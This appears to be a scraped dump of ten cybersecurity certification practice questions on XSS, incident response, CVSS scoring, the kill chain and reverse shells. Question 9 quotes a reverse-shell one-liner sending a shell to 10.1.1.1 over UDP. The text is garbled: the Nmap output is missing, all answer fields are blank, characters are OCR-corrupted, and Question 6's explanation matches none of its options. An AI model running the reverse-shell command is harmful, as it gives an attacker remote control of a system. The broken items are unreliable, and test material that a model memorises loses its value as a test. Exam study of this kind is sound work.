Question No : 1
The security team reviews a web server for XSS and runs the following Nmap scan:



Which of the following most accurately describes the result of the scan?

• A.An output of characters > and " as the parameters used m the attempt
• B.The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned
• C.The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
• D.The vulnerable parameter and characters > and " with a reflected XSS attempt

Show Answers

Answer:
Explanation:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack where the malicious code is embedded in a URL or a form parameter that is sent to the web server and then reflected back to the user’s browser. In this case, the Nmap scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL http://172.31.15.2/1.php?id=2.

Question No : 2
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

• A.Business continuity plan
• B.Vulnerability management plan
• C.Disaster recovery plan
• D.Asset management plan

Show Answers

Answer:
Explanation:

Question No : 3
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

• A.The lead should review what is documented in the incident response policy or plan
• B.Management level members of the CSIRT should make that decision
• C.The lead has the authority to decide who to communicate with at any t me
• D.Subject matter experts on the team should communicate with others within the specified area of expertise

Show Answers

Answer:
Explanation:
The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Question No : 4
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application.
Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

• A.Conduct regular red team exercises over the application in production
• B.Ensure that all implemented coding libraries are regularly checked
• C.Use application security scanning as part of the pipeline for the CI/CDflow
• D.Implement proper input validation for any data entry form

Show Answers

Answer:
Explanation:
Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers. Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and
frequently as part of the CI/CD process.

Question No : 5
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?

• A.There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
• B.An on-path attack is being performed by someone with internal access that forces users into port 80
• C.The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
• D.An error was caused by BGP due to new rules applied over the company's internal routers

Show Answers

Answer:
Explanation:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.

Question No : 6
1.A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability.
Which of the following CVE metrics would be most accurate for this zero-day threat?

• A.CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
• B.CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
• C.CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
• D.CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Show Answers

Answer:
Explanation:
This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L). Official.
Reference: https://nvd.nist.gov/vuln-metrics/cvss

Question No : 7
An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets.
Which of the following steps of an attack framework is the analyst witnessing?

• A.Exploitation
• B.Reconnaissance
• C.Command and control
• D.Actions on objectives

Show Answers

Answer:
Explanation:
Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before carrying out any penetration testing. The reconnaissance stage may include identifying potential targets, finding their vulnerabilities, discovering which third parties are connected to them (and what data they can access), and exploring existing entry points as well as finding new ones. Reconnaissance can take place both online and offline. In this case, an analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. This indicates that the analyst is witnessing reconnaissance activity by an attacker.
Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question No : 8
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?

• A.Implement step-up authentication for administrators
• B.Improve employee training and awareness
• C.Increase password complexity standards
• D.Deploy mobile device management

Show Answers

Answer:
Explanation:
The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

Question No : 9
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

• A.RCE
• B.Reverse shell
• C.XSS
• D.SQL injection

Show Answers

Answer:
Explanation:
A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

Question No : 10
When starting an investigation, which of the following must be done first?

• A.Notify law enforcement
• B.Secure the scene
• C.Seize all related evidence
• D.Interview the witnesses

Show Answers

Answer:
Explanation:
The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.